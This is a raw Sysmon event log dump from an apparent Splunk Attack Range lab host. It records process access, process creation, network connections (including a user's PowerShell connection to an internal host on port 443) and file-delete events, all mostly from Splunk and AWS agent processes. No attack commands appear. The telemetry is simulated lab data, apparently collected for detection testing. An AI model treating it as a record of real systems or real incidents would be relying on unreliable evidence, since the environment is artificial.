21:49:40.702{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126679Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.702{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126678Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.702{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8174-613A-9096-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126677Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.702{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8174-613A-9096-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126676Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:40.698{B81B27B7-8174-613A-9096-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035126709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:06.393{B81B27B7-4014-611D-3600-00000000C801}3260C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61929-false169.254.169.254-80http 354300x800000000000000035126708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:06.264{B81B27B7-4014-611D-3600-00000000C801}3260C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61928-false169.254.169.254-80http 354300x800000000000000035126707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:06.225{B81B27B7-4014-611D-3600-00000000C801}3260C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61927-false169.254.169.254-80http 354300x800000000000000035126706Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:06.224{B81B27B7-4014-611D-3600-00000000C801}3260C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61926-false169.254.169.254-80http 10341000x800000000000000035126705Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8175-613A-9296-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126704Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126703Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126702Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126701Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126700Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8175-613A-9296-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126699Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.864{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8175-613A-9296-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126698Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.850{B81B27B7-8175-613A-9296-03000000C801}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035126697Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.849{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D4C780D7F4658C81D4703C07557E03E,SHA256=7C563607CACDED4D2A1308EC42D66B7815B1123F0E1E1A2B174E08C405BBBB5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126696Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.702{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBCACE222272B2FD3ED52CB95AEC40E4,SHA256=CFC853EE59A0E65EA4E28D2E84CCF45B1AF572F019BFD3E18D76F4E02F2864D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126695Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.702{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F31FB035991133CAE758207BC1E9635,SHA256=4927C168BA8440DE18BF94616D8F19C5825502D0D44F75783AF57767D8DC7F8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126694Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.402{B81B27B7-8175-613A-9196-03000000C801}3004648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126693Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8175-613A-9196-03000000C801}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126692Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126691Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126690Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126689Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126688Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8175-613A-9196-03000000C801}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126687Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.265{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8175-613A-9196-03000000C801}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126686Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:41.251{B81B27B7-8175-613A-9196-03000000C801}3004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035126713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:07.408{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61931-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:07.370{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61930-false10.0.1.12-8000- 23542300x800000000000000035126711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:42.863{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B74245327C64B22477EFF7EA6A05811,SHA256=B084815985A71BA72BE789484DA08FE1FFA9B581F0E37FDB9E9FBBEB778C2DA2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:42.248{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C23050FDE72503A415DB9DF512BAA4DF,SHA256=FD6225DFDFA16FE0F6BB41A51D809EDC27ADCB4C0065EE661C8D5B120F5816DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:43.878{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104A53692B8CB918819E2DA186177B85,SHA256=39C8C32C6395E31D089DCD275EBAB237839DD7BAC323DD1FFB3BAD17776CF9D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:43.032{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CBCACE222272B2FD3ED52CB95AEC40E4,SHA256=CFC853EE59A0E65EA4E28D2E84CCF45B1AF572F019BFD3E18D76F4E02F2864D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:44.895{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0995E11AA2B60D7E94CB9451AF13A28F,SHA256=FF0F8D1925DA509888DA1904E0E5B59351D3E7A42CE434BEC9E52B20115BA096,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 